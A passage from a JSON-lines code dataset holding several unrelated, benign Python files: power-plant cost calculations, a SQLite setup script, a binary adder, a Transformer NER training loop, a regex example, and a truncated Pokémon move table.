level fuel cost per unit heat input\n # for *each* fuel, which we can combine to figure out the fuel cost per\n # unit net electricity generation on a generator basis.\n\n # We have to do these calculations separately for the single and multi-fuel\n # plants because in the case of the one fuel plants we need to sum up all\n # of the fuel costs -- including both primary and secondary fuel\n # consumption -- whereas in the multi-fuel plants we are going to look at\n # fuel costs on a per-fuel basis (this is very close to being correct,\n # since secondary fuels are typically a fraction of a percent of the\n # plant's overall costs).\n\n one_fuel_gb = one_fuel.groupby(by=['report_date', 'plant_id_eia'])\n one_fuel_agg = one_fuel_gb.agg({\n 'total_fuel_cost': np.sum,\n 'total_heat_content_mmbtu': np.sum\n })\n one_fuel_agg['fuel_cost_per_mmbtu'] = \\\n one_fuel_agg['total_fuel_cost'] / \\\n one_fuel_agg['total_heat_content_mmbtu']\n one_fuel_agg = one_fuel_agg.reset_index()\n one_fuel = pd.merge(one_fuel[['plant_id_eia', 'report_date',\n 'generator_id', 'heat_rate_mmbtu_mwh']],\n one_fuel_agg[['plant_id_eia', 'report_date',\n 'fuel_cost_per_mmbtu']],\n on=['plant_id_eia', 'report_date'])\n one_fuel = one_fuel.drop_duplicates(\n subset=['plant_id_eia', 'report_date', 'generator_id'])\n\n multi_fuel = multi_fuel[['plant_id_eia', 'report_date', 'generator_id',\n 'fuel_cost_per_mmbtu', 'heat_rate_mmbtu_mwh']]\n\n fuel_cost = one_fuel.append(multi_fuel)\n fuel_cost['fuel_cost_per_mwh'] = \\\n fuel_cost['fuel_cost_per_mmbtu'] * fuel_cost['heat_rate_mmbtu_mwh']\n fuel_cost = \\\n fuel_cost.sort_values(['report_date', 'plant_id_eia', 'generator_id'])\n\n out_df = gen_w_ft.drop('heat_rate_mmbtu_mwh', axis=1)\n out_df = pd.merge(out_df.drop_duplicates(), fuel_cost,\n on=['report_date', 'plant_id_eia', 'generator_id'])\n\n return(out_df)\n\n\ndef capacity_factor(gens_eia860, gen_eia923, min_cap_fact=0, max_cap_fact=1.5):\n \"\"\"\n Calculate the capacity factor for each generator.\n\n Capacity Factor is calculated by using the net generation from eia923 and\n the nameplate capacity from eia860. The net gen and capacity are pulled\n into one dataframe, then the dates from that dataframe are pulled out to\n determine the hours in each period based on the frequency. The number of\n hours is used in calculating the capacity factor. Then the 'bad' records\n are dropped.\n \"\"\"\n # infer the natural frequency of our input dataset:\n freq = pd.infer_freq(\n pd.DatetimeIndex(gen_eia923.report_date.unique()).sort_values()\n )\n # Only include columns to be used\n gens_eia860 = gens_eia860[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'nameplate_capacity_mw']]\n gen_eia923 = gen_eia923[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'net_generation_mwh']]\n\n # merge the generation and capacity to calculate capacity factor\n capacity_factor = analysis.merge_on_date_year(gen_eia923,\n gens_eia860,\n on=['plant_id_eia',\n 'generator_id'])\n\n # get a unique set of dates to generate the number of hours\n dates = capacity_factor['report_date'].drop_duplicates()\n dates_to_hours = pd.DataFrame(\n data={'report_date': dates,\n 'hours': dates.apply(lambda d: (pd.date_range(d, periods=2,\n freq=freq)[1] -\n pd.date_range(d, periods=2,\n freq=freq)[0]) /\n pd.Timedelta(hours=1))})\n\n # merge in the hours for the calculation\n capacity_factor = capacity_factor.merge(dates_to_hours, on=['report_date'])\n\n # actually calculate capacity factor wooo!\n capacity_factor['capacity_factor'] = \\\n capacity_factor['net_generation_mwh'] / \\\n (capacity_factor['nameplate_capacity_mw'] * capacity_factor['hours'])\n\n # Replace unrealistic capacity factors with NaN\n capacity_factor.loc[capacity_factor['capacity_factor']\n < min_cap_fact, 'capacity_factor'] = np.nan\n capacity_factor.loc[capacity_factor['capacity_factor']\n >= max_cap_fact, 'capacity_factor'] = np.nan\n\n # drop the hours column, cause we don't need it anymore\n capacity_factor.drop(['hours'], axis=1, inplace=True)\n\n return(capacity_factor)\n\n\ndef mcoe(freq='AS', testing=False,\n start_date=None, end_date=None,\n min_heat_rate=5.5, min_cap_fact=0.0, max_cap_fact=1.5,\n output=None, debug=False):\n \"\"\"\n Compile marginal cost of electricity (MCOE) at the generator level.\n\n Use data from EIA 923, EIA 860, and (eventually) FERC Form 1 to estimate\n the MCOE of individual generating units. By default, this is done at\n annual resolution, since the FERC Form 1 data is annual. Perform the\n calculation for time periods between start_date and end_date. If those\n dates aren't given, then perform the calculation across all of the years\n for which the EIA 923 data is available.\n\n Args:\n freq: String indicating time resolution on which to calculate MCOE.\n start_date: beginning of the date range to calculate MCOE within.\n end_date: end of the date range to calculate MCOE within.\n output: path to output CSV to. No output if None.\n plant_id: Which plant ID to aggregate on? PUDL or EIA?\n min_heat_rate: lowest plausible heat rate, in mmBTU/MWh.\n\n Returns:\n mcoe: a dataframe organized by date and generator, with lots of juicy\n information about MCOE.\n\n Issues:\n - Start and end dates outside of the EIA860 valid range don't seem to\n result in additional EIA860 data being synthesized and returned.\n - Merge annual data with other time resolutions.\n \"\"\"\n # If we haven't been given start & end dates, use the full extent of\n # the EIA923 data:\n if start_date is None:\n start_date = \\\n pd.to_datetime('{}-01-01'.format(min(pc.working_years['eia923'])))\n else:\n # Make sure it's a date... and not a string.\n start_date = pd.to_datetime(start_date)\n if end_date is None:\n end_date = \\\n pd.to_datetime('{}-12-31'.format(max(pc.working_years['eia923'])))\n else:\n # Make sure it's a date... and not a string.\n end_date = pd.to_datetime(end_date)\n\n # Select the required data from the database:\n # Generation:\n gen_eia923 = outputs.generation_eia923(freq=freq, testing=testing,\n start_date=start_date,\n end_date=end_date)\n # Boiler Fuel Consumption:\n bf_eia923 = outputs.boiler_fuel_eia923(freq=freq, testing=testing,\n start_date=start_date,\n end_date=end_date)\n # Grab information about the individual generators:\n gens_eia860 = outputs.generators_eia860(testing=testing,\n start_date=start_date,\n end_date=end_date)\n # The proto-BGA:\n bga_eia860 = outputs.boiler_generator_assn_eia860(testing=testing,\n start_date=start_date,\n end_date=end_date)\n # The Boiler - Generator Associations:\n bga = boiler_generator_association(bga_eia860, gens_eia860,\n gen_eia923, bf_eia923,\n start_date=start_date,\n end_date=end_date,\n testing=testing)\n\n # Remove all associations tagged as bad for one reason or another\n bga_good = bga[~bga.missing_from_923 &\n ~bga.plant_w_bad_generator &\n ~bga.unmapped_but_in_923 &\n ~bga.unmapped]\n\n bga_good = bga_good.drop(['missing_from_923',\n 'plant_w_bad_generator',\n 'unmapped_but_in_923',\n 'unmapped'], axis=1)\n bga_good = bga_good.drop_duplicates(subset=['report_date', 'plant_id_eia',\n 'boiler_id', 'generator_id'])\n # Now, calculate the heat_rates on a per-generator basis:\n hr = heat_rate(bga_good, gen_eia923, bf_eia923, gens_eia860,\n min_heat_rate=min_heat_rate)\n\n frc_eia923 = outputs.fuel_receipts_costs_eia923(freq=freq, testing=testing,\n start_date=start_date,\n end_date=end_date)\n # Calculate fuel costs by generator\n fc = fuel_cost(hr, frc_eia923, gen_eia923)\n # Calculate capacity factors by generator\n cf = capacity_factor(gens_eia860, gen_eia923,\n min_cap_fact=min_cap_fact,\n max_cap_fact=max_cap_fact)\n # Compile the above into a single dataframe for output/return.\n mcoe_out = pd.merge(fc,\n cf[['report_date', 'plant_id_eia',\n 'generator_id', 'capacity_factor']],\n on=['report_date', 'plant_id_eia', 'generator_id'],\n how='left')\n\n return(mcoe_out)\n\n\ndef single_gens(df, key_cols=['report_date', 'plant_id_eia', 'generator_id']):\n \"\"\"Test whether dataframe has a single record per generator.\"\"\"\n len_1 = len(df)\n len_2 = len(df.drop_duplicates(subset=key_cols))\n if len_1 == len_2:\n return True\n else:\n return False\n\n\ndef nonunique_gens(df,\n key_cols=['plant_id_eia', 'generator_id', 'report_date']):\n \"\"\"Generate a list of all the non-unique generator reecords for testing.\"\"\"\n unique_gens = df.drop_duplicates(subset=key_cols)\n dupes = df[~df.isin(unique_gens)].dropna()\n dupes = dupes.sort_values(by=key_cols)\n return(dupes)\n","sub_path":"pudl/mcoe.py","file_name":"mcoe.py","file_ext":"py","file_size_in_byte":32085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"410898982","text":"import sqlite3\r\nfrom sqlite3 import Error\r\n\r\n\r\ndef main():\r\n database = \"C:/Users/Matt/PycharmProjects/MeditationLog/MeditationData.db\"\r\n\r\n sql_create_sessions_table = \"\"\" CREATE TABLE IF NOT EXISTS sessions (\r\n id integer PRIMARY KEY autoincrement,\r\n session_begin datetime,\r\n session_end datetime,\r\n notes text\r\n ); \"\"\"\r\n\r\n # create a database connection\r\n conn = create_connection(database)\r\n if conn is not None:\r\n # create projects table\r\n create_table(conn, sql_create_sessions_table)\r\n\r\n else:\r\n print(\"Error! cannot create the database connection.\")\r\n\r\n\r\ndef create_connection(db_file):\r\n \"\"\" create a database connection to the SQLite database\r\n specified by db_file\r\n :param db_file: database file\r\n :return: Connection object or None\r\n \"\"\"\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n\r\n return None\r\n\r\n\r\ndef create_table(conn, create_table_sql):\r\n \"\"\" create a table from the create_table_sql statement\r\n :param conn: Connection object\r\n :param create_table_sql: a CREATE TABLE statement\r\n :return:\r\n \"\"\"\r\n try:\r\n c = conn.cursor()\r\n c.execute(create_table_sql)\r\n except Error as e:\r\n print(e)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"155963694","text":"\"\"\" Program to add 2 binary numbers\"\"\"\n\ndef binary_adder(num1, num2):\n \"\"\"\n input - num1 type(integer) - the first binary number to add\n num2 type(integer) - the second binary number to add\n\n output - type(integer) - the sum of both numbers in binary form\n \"\"\"\n\n def base_2_converter(num):\n \"\"\" function to convert a binary number to base 10\"\"\"\n # This works by using the mathematical formula (x * (2 ** 2)) + (y * (2 ** 1)) + (z * (2 ** 0)) where xyz are digits of a binary number\n base_10 = sum((int(j) * (2 ** i) for i, j in enumerate(str(num)[::-1])))\n return base_10\n\n def base_10_converter(num):\n \"\"\" function to convert base 10 number to binary\"\"\"\n # this works by dividing the number by 2 and storing it's remainder and reversing that to get the binary number\n base_raw = \"\"\n while num != 1:\n base_raw += str(num % 2)\n num //= 2\n return int((base_raw + \"1\")[::-1])\n\n # first convert both numbers to base 10\n num1 = base_2_converter(num1)\n num2 = base_2_converter(num2)\n\n # add both numbers in base 10\n num = num1 + num2\n\n # convert back to base 2\n binary = base_10_converter(num)\n\n return binary\n\nprint(binary_adder(10, 1))\n","sub_path":"gov/assets/img/uploads/documents/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"74068572","text":"import sys\nsys.path.append(\"../\")\nimport pickle\nfrom Config.config import config\nimport tensorflow as tf\nfrom model.Transformer_NER import Encoder\nfrom DataLoader.bucket_and_batch import bucket_and_batch\nsys.path.append(\"../../\")\nfrom utils.eval import eval\nimport numpy as np\nimport math\nimport string\nimport random\n\n\nbnb = bucket_and_batch()\neval = eval()\n\nhyperparameters = config['CoNLL2003_Hyperparameters']\n\nval_batch_tokens = 64\ntrain_batch_tokens = 64\n\nmax_iterations = 1000\n\ndim = hyperparameters['dim']\n\nwith open('../Processed_Data/CoNLL_NER_2003.pkl', 'rb') as fp:\n data = pickle.load(fp)\n\ntags2idx = data['tags2idx']\ntrain_text = data['train_text']\ntrain_tags = data['train_tags']\nval_text = data['val_text']\nval_tags = data['val_tags']\nvocab2idx = data['vocab2idx']\nembd = data['embd']\n\nidx2vocab = {v: k for k, v in vocab2idx.items()}\n\ntf_text = tf.placeholder(tf.int32, [None, None])\ntf_labels = tf.placeholder(tf.int32, [None, None])\ntf_true_seq_lens = tf.placeholder(tf.int32, [None])\ntf_train = tf.placeholder(tf.bool)\ntf_learning_rate = tf.placeholder(tf.float32)\n\nlabels2idx = tags2idx\nidx2labels = {v: k for k, v in labels2idx.items()}\n\nclass_weights = [1.0 for tag in tags2idx]\nclass_weights[labels2idx['O']] = 1.0\n\n\nmodel = Encoder(config_key='CoNLL2003_Hyperparameters',\n text=tf_text,\n labels=tf_labels,\n dim=300,\n tags_size=len(labels2idx),\n true_seq_len=tf_true_seq_lens,\n train=tf_train,\n learning_rate=tf_learning_rate,\n word_embeddings=embd,\n class_weights=class_weights)\n\n\nparameter_count = np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])\nprint(\"\\n\\nNumber of Parameters: {}\\n\\n\".format(parameter_count))\n\n\nepochs = 100\n\nwith tf.Session() as sess: # Start Tensorflow Session\n\n val_batches_source, val_batches_labels, val_batches_true_seq_lens = bnb.bucket_and_batch(\n val_text, val_tags, vocab2idx, labels2idx, val_batch_tokens)\n\n print(\"Validation batches loaded\")\n\n train_batches_source, train_batches_labels, train_batches_true_seq_lens = bnb.bucket_and_batch(\n train_text, train_tags, vocab2idx, labels2idx, train_batch_tokens)\n\n print(\"Train batches loaded\")\n\n display_step = 100\n patience = hyperparameters['patience']\n\n load = 'n' # input(\"\\nLoad checkpoint? y/n: \")\n print(\"\")\n\n filtered_var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n saver = tf.train.Saver(var_list=filtered_var_list)\n\n if load.lower() == 'y':\n\n print('Loading pre-trained weights for the model...')\n\n saver.restore(sess, '../Model_Backup/Transformer/Transformer.ckpt')\n sess.run(tf.global_variables())\n sess.run(tf.tables_initializer())\n\n with open('../Model_Backup/Transformer/Transformer.pkl', 'rb') as fp:\n train_data = pickle.load(fp)\n\n epochs_covered = train_data['epochs_covered']\n best_loss = train_data['best_loss']\n best_F1 = train_data['best_F1']\n impatience = train_data['impatience']\n steps = train_data['steps']\n train_losses = train_data['train_losses']\n val_losses = train_data['val_losses']\n train_F1s = train_data['train_F1s']\n val_F1s = train_data['val_F1s']\n\n print('\\nRESTORATION COMPLETE\\n')\n\n else:\n\n epochs_covered = 0\n best_loss = math.inf\n best_F1 = -math.inf\n impatience = 0\n steps = 1\n train_losses = []\n train_F1s = []\n val_losses = []\n val_F1s = []\n\n init = tf.global_variables_initializer()\n sess.run(init)\n sess.run(tf.tables_initializer())\n\n for epoch in range(epochs_covered, epochs):\n\n batches_indices = [i for i in range(0, len(train_batches_source))]\n random.shuffle(batches_indices)\n\n total_train_loss = 0\n total_tp = 0\n total_pred_len = 0\n total_gold_len = 0\n\n for i in range(0, min(1000, len(train_batches_source))):\n\n #warmup_steps = 4000\n #lrate = (dim**(-.5))*min(steps**(-0.5), steps*(warmup_steps**(-1.5)))\n\n lrate = hyperparameters['lrate']\n\n j = int(batches_indices[i])\n\n cost, prediction,\\\n _ = sess.run([model.display_loss,\n model.predictions,\n model.train_ops],\n feed_dict={tf_text: train_batches_source[j],\n tf_labels: train_batches_labels[j],\n tf_true_seq_lens: train_batches_true_seq_lens[j],\n tf_train: True,\n tf_learning_rate: lrate})\n\n steps += 1\n\n tp, pred_len, gold_len = eval.stats(train_batches_labels[j],\n prediction,\n train_batches_true_seq_lens[j],\n idx2labels)\n\n total_tp += tp\n total_pred_len += pred_len\n total_gold_len += gold_len\n total_train_loss += cost\n\n _, _, F1 = eval.F1(tp, pred_len, gold_len)\n\n if i % display_step == 0:\n\n print(\"Iter \"+str(i)+\", Cost = \" +\n \"{:.3f}\".format(cost)+\", F1 = \" +\n \"{:.3f}\".format(F1))\n\n _, _, train_F1 = eval.F1(total_tp, total_pred_len, total_gold_len)\n\n train_F1s.append(train_F1)\n train_len = len(train_batches_source)\n train_losses.append(total_train_loss/train_len)\n\n print(\"\\n\\n\")\n\n total_val_cost = 0\n total_tp = 0\n total_pred_len = 0\n total_gold_len = 0\n\n for i in range(0, len(val_batches_source)):\n\n if (i+1) % 100 == 0:\n print(\"Validating Batch {}\".format(i+1))\n\n cost, prediction,\\\n acc = sess.run([model.display_loss,\n model.predictions,\n model.accuracy],\n feed_dict={tf_text: val_batches_source[i],\n tf_labels: val_batches_labels[i],\n tf_true_seq_lens: val_batches_true_seq_lens[i],\n tf_train: False})\n\n tp, pred_len, gold_len = eval.stats(val_batches_labels[i],\n prediction,\n val_batches_true_seq_lens[i],\n idx2labels)\n\n total_tp += tp\n total_pred_len += pred_len\n total_gold_len += gold_len\n total_val_cost += cost\n\n _, _, val_F1 = eval.F1(total_tp, total_pred_len, total_gold_len)\n\n val_len = len(val_batches_source)\n\n avg_val_cost = total_val_cost/val_len\n\n val_F1s.append(val_F1)\n val_losses.append(avg_val_cost)\n\n print(\"\\n\\nVALIDATION\\n\\n\")\n\n print(\"Epoch \" + str(epoch) + \", Validation Loss= \" +\n \"{:.3f}\".format(avg_val_cost) + \", Validation F1= \" +\n \"{:.3f}\".format(val_F1))\n\n flag = 0\n impatience += 1\n\n if avg_val_cost < best_loss:\n\n impatience = 0\n\n best_loss = avg_val_cost\n\n if val_F1 >= best_F1:\n\n impatience = 0\n\n best_F1 = val_F1\n\n flag = 1\n\n if flag == 1:\n\n saver.save(sess, '../Model_Backup/Transformer/Transformer.ckpt')\n\n PICKLE_dict = {'epochs_covered': epoch+epochs_covered+1,\n 'best_loss': best_loss,\n 'best_F1': best_F1,\n 'impatience': impatience,\n 'steps': steps,\n 'train_losses': train_losses,\n 'val_losses': val_losses,\n 'train_F1s': train_F1s,\n 'val_F1s': val_F1s}\n\n with open('../Model_Backup/Transformer/Transformer.pkl', 'wb') as fp:\n pickle.dump(PICKLE_dict, fp)\n\n print(\"Checkpoint created!\")\n\n print(\"\\n\")\n\n if impatience > patience:\n break\n","sub_path":"CoNLL2003/Train/Transformer_train.py","file_name":"Transformer_train.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"128087186","text":"# \\A\tReturns a match if the specified characters are at the beginning of the string\t\"\\AThe\"\nimport re\n\ntxt = \"The car is in black colour\"\n\n#Check if the string starts with \"The\":\n\nx = re.findall(\"\\AThe\", txt)\n\nprint(x)\n\nif x:\n print(\"Yes, there is a match!\")\nelse:\n print(\"No match\")\n","sub_path":"Python_RegEx/SpecialSequences.py/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"347132824","text":"import sys\nsys.stdin = open(\"원안의사각형_input.txt\")\n\nN = int(input())\nres=0\nfor i in range(N-1, -1, -1):\n for j in range(1, N+1):\n square = (i**2 + j**2)**0.5\n # print(square, j)\n if N < square:\n res += j-1\n break\nres *= 4\nprint(res)\n\n# 3137548","sub_path":"codeXpert/0304월요일/원안의사각형.py","file_name":"원안의사각형.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"352257288","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*- \n\n# from collections import named tuple module.\nfrom collections import namedtuple\n# import random module\nimport random\n# import regex module\nimport re\n# import system module\nimport sys\n# import pokemon types module\nfrom pokemon_types import *\n\n########################\n### File information ###\n########################\n\n__author__ = \"Lindsay Gelle (https://github.com/gellel)\"\n\n__version__ = \"1.0\"\n\n__all__ = [\n\t\"ABSORB\",\n\t\"ACID\",\n\t\"ACID_ARMOUR\",\n\t\"AGILITY\",\n\t\"AMNESIA\",\n\t\"AURORA_BEAM\",\n\t\"BARRAGE\",\n\t\"BARRIER\",\n\t\"BIDE\",\n\t\"BIND\",\n\t\"BITE\",\n\t\"BLIZZARD\",\n\t\"BODY_SLAM\",\n\t\"BONEMERANG\",\n\t\"BONE_CLUB\",\n\t\"BUBBLE\",\n\t\"BUBBLE_BEAM\",\n\t\"CLAMP\",\n\t\"COMET_PUNCH\",\n\t\"CONFUSE_RAY\",\n\t\"CONFUSION\",\n\t\"CONSTRICT\",\n\t\"CONVERSION\",\n\t\"COUNTER\",\n\t\"CRABHAMMER\",\n\t\"CUT\",\n\t\"DEFENSE_CURL\",\n\t\"DIG\",\n\t\"DISABLE\",\n\t\"DIZZY_PUNCH\",\n\t\"DOUBLE_EDGE\",\n\t\"DOUBLE_KICK\",\n\t\"DOUBLE_SLAP\",\n\t\"DOUBLE_TEAM\",\n\t\"DRAGON_RAGE\",\n\t\"DREAM_EATER\",\n\t\"DRILL_PECK\",\n\t\"EARTHQUAKE\",\n\t\"EGG_BOMB\",\n\t\"EMBER\",\n\t\"EXPLOSION\",\n\t\"FIRE_BLAST\",\n\t\"FIRE_PUNCH\",\n\t\"FIRE_SPIN\",\n\t\"FISSURE\",\n\t\"FLAMETHROWER\",\n\t\"FLASH\",\n\t\"FLY\",\n\t\"FOCUS_ENERGY\",\n\t\"FURY_ATTACK\",\n\t\"FURY_SWIPES\",\n\t\"GLARE\",\n\t\"GROWL\",\n\t\"GROWTH\",\n\t\"GUILLOTINE\",\n\t\"GUST\",\n\t\"HARDEN\",\n\t\"HAZE\",\n\t\"HEADBUTT\",\n\t\"HORN_ATTACK\",\n\t\"HORN_DRILL\",\n\t\"HYDRO_PUMP\",\n\t\"HYPER_BEAM\",\n\t\"HYPER_Fang\",\n\t\"HYPNOSIS\",\n\t\"ICE_BEAM\",\n\t\"ICE_PUNCH\",\n\t\"JUMP_KICK\",\n\t\"KARATE_CHOP\",\n\t\"KINESIS\",\n\t\"LEECH_LIFE\",\n\t\"LEECH_SEED\",\n\t\"LEER\",\n\t\"LICK\",\n\t\"LIGHT_SCREEN\",\n\t\"LOVELY_KISS\",\n\t\"LOW_KICK\",\n\t\"MEDITATE\",\n\t\"MEGA_DRAIN\",\n\t\"MEGA_KICK\",\n\t\"MEGA_PUNCH\",\n\t\"METRONOME\",\n\t\"MIMIC\",\n\t\"MINIMIZE\",\n\t\"MIRROR_MOVE\",\n\t\"MIST\",\n\t\"NIGHT_SHADE\",\n\t\"PAY_DAY\",\n\t\"PECK\",\n\t\"PETAL_DANCE\",\n\t\"PIN_MISSILE\",\n\t\"POISON_GAS\",\n\t\"POISON_POWDER\",\n\t\"POISON_STING\",\n\t\"POUND\",\n\t\"PSYBEAM\",\n\t\"PSYCHIC\",\n\t\"PSYWAVE\",\n\t\"QUICK_ATTACK\",\n\t\"RAGE\",\n\t\"RAZOR_LEAF\",\n\t\"RAZOR_WIND\",\n\t\"RECOVER\",\n\t\"REFLECT\",\n\t\"REST\",\n\t\"ROAR\",\n\t\"ROCK_SLIDE\",\n\t\"ROCK_THROW\",\n\t\"ROLLING_KICK\",\n\t\"SAND_ATTACK\",\n\t\"SCRATCH\",\n\t\"SCREECH\",\n\t\"SEISMIC_TOSS\",\n\t\"SELF_DESTRUCT\",\n\t\"SHARPEN\",\n\t\"SING\",\n\t\"SKULL_BASH\",\n\t\"SKY_ATTACK\",\n\t\"SLAM\",\n\t\"SLASH\",\n\t\"SLEEP_POWDER\",\n\t\"SLUDGE\",\n\t\"SMOG\",\n\t\"SMOKESCREEN\",\n\t\"SOFT_BOILED\",\n\t\"SOLAR_BEAM\",\n\t\"SONIC_BOOM\",\n\t\"SPIKE_CANNON\",\n\t\"SPLASH\",\n\t\"SPORE\",\n\t\"STOMP\",\n\t\"STRENGTH\",\n\t\"STRING_SHOT\",\n\t\"STRUGGLE\",\n\t\"STUN_SPORE\",\n\t\"SUBMISSION\",\n\t\"SUBSTITUTE\",\n\t\"SUPERSONIC\",\n\t\"SUPER_FANG\",\n\t\"SURF\",\n\t\"SWIFT\",\n\t\"SWORDS_DANCE\",\n\t\"TACKLE\",\n\t\"TAIL_WHIP\",\n\t\"TAKE_DOWN\",\n\t\"TELEPORT\",\n\t\"THRASH\",\n\t\"THUNDER\",\n\t\"THUNDERBOLT\",\n\t\"THUNDER_PUNCH\",\n\t\"THUNDER_SHOCK\",\n\t\"THUNDER_WAVE\",\n\t\"TOXIC\",\n\t\"TRANSFORM\",\n\t\"TRI_ATTACK\",\n\t\"TWINEEDLE\",\n\t\"VICE_GRIP\",\n\t\"VINE_WHIP\",\n\t\"WATERFALL\",\n\t\"WATER_GUN\",\n\t\"WHIRLWIND\",\n\t\"WING_ATTACK\",\n\t\"WITHDRAW\",\n\t\"WATER\"]\n\n########################\n### Module constants ###\n########################\n\nABSORB = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 20,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"User recovers half the HP inflicted on opponent.\")\n\nACID = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May lower opponent's Special Defense.\")\n\nACID_ARMOUR = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Defense.\")\n\nAGILITY = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Sharply raises user's Speed.\")\n\nAMNESIA = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Special Defense.\")\n\nAURORA_BEAM = dict(\n\tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65, \n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May lower opponent's Attack.\")\n\nBARRAGE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nBARRIER = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Defense.\")\n\nBIDE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User takes damage for two turns then strikes back double.\")\n\nBIND = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\nBITE = dict(\n \tELEMENT_TYPE = \"DARK\",\n\tATTRIBUTES = DARK,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 60,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"May cause flinching.\")\n\nBLIZZARD = dict(\n \tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110,\n\tACCURACY = 70,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"May freeze opponent.\")\n\nBODY_SLAM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 85,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nBONE_CLUB = dict(\n\tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 65,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May cause flinching.\")\n\nBONEMERANG = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Hits twice in one turn.\")\n\nBUBBLE = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May lower opponent's Speed.\")\n\nBUBBLE_BEAM = dict(\n\tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65, \n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May lower opponent's Speed.\")\n\nCLAMP = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 35,\n\tACCURACY = 85,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\nCOMET_PUNCH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 